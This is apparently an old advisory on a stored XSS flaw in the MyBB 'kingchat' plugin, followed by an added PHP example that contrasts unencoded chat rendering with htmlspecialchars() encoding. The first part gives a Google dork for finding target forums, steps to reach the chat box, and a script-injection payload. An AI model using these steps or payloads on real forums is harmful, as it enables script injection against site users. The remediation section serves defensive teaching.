Exploit Title: MyBB 'kingchat' chat-box plugin.
Google Dork: inurl:/kingchat.php?
Date: 8/12/12
Author: VipVince
Vendor Homepage: http://mods.mybb.com/
Software Link: http://mods.mybb.com/view/kingchat
Tested on: Windows

Using the dork inurl:/kingchat.php? you will see multiple forums running this chat plugin.

Note: *Registration on the forums is required* for persistent XSS to work.

Now click a random forum with this plugin installed and you will see this:

http://vulnforum.com/kingchat.php?notic

Remove 'notic' at the end of the URL and add "chat=2&l=2" to our query so it becomes:

http://server/kingchat.php?chat=2&l=2

You will see the vulnerable chat box :). Submit your XSS, for instance <script>alert("vipvince")</script>

Now to see our saved JavaScript alert go to:

http://server/kingchat.php?chat=2&l=2&message=

Your persistent XSS will be stored here.

Enjoy ;). VipVince.
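
For forum operators and plugin maintainers: the behaviour described above is what results when stored chat text is written into the page without HTML encoding. The block below is an added example, not code from the kingchat plugin or from the original advisory; it assumes that rendering pattern, and the message rows, render_unsafe(), render_safe() and h() are constructed names used to contrast it with encoding at output time through PHP's htmlspecialchars().

```php
<?php
// Added illustration: the store, helpers and rows below are hypothetical,
// not taken from the kingchat plugin.

// Constructed sample rows, as a chat table might hold them.
$messages = [
    ['user' => 'alice',    'text' => 'hello everyone'],
    ['user' => 'mallory',  'text' => '<script>alert("vipvince")</script>'],
    ['user' => 'bob"><b>', 'text' => "it's 1 < 2 & 3 > 2"],
];

// Unsafe pattern: stored values are concatenated into HTML unchanged, so
// markup submitted by one registered user is parsed by every viewer's browser.
function render_unsafe(array $rows): string
{
    $html = '';
    foreach ($rows as $r) {
        $html .= '<li><b>' . $r['user'] . '</b>: ' . $r['text'] . "</li>\n";
    }
    return $html;
}

// Encode for the HTML context when writing output. ENT_QUOTES converts both
// quote styles (needed if a value is ever placed in an attribute) and
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every stored field, the user name included, is encoded.
function render_safe(array $rows): string
{
    $html = '';
    foreach ($rows as $r) {
        $html .= '<li><b>' . h($r['user']) . '</b>: ' . h($r['text']) . "</li>\n";
    }
    return $html;
}

echo "--- unsafe ---\n", render_unsafe($messages);
echo "--- encoded ---\n", render_safe($messages);

// Regression check a maintainer can keep: no raw tag may survive encoding.
if (strpos(render_safe($messages), '<script') !== false) {
    fwrite(STDERR, "raw markup reached the page\n");
    exit(1);
}
```

Encoding at output rather than at submission keeps the stored text intact and also covers rows that were saved before the fix.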